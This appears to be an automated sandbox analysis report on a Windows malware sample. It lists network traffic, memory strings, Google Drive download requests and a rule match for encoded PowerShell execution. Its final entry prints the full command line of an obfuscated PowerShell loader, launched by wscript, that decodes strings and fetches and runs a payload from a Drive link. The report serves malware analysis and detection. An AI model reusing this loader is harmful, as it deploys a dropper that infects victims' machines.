Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: unknown |
HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49699 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49700 version: TLS 1.2 |
Source: |
Binary string: e.pdb#K source: powershell.exe, 00000002.00000002.2193820727.0000017EB8F04000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb`T]e source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Target.pdbion* 1TX]d source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbK source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbo source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdb|XEd source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^C source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbip source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBCB97000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAED8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googPR2 |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT32 |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iTP |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBBD4D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro0 |
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49699 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: unknown |
HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49699 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49700 version: TLS 1.2 |
Source: amsi64_1132.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1132, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigit |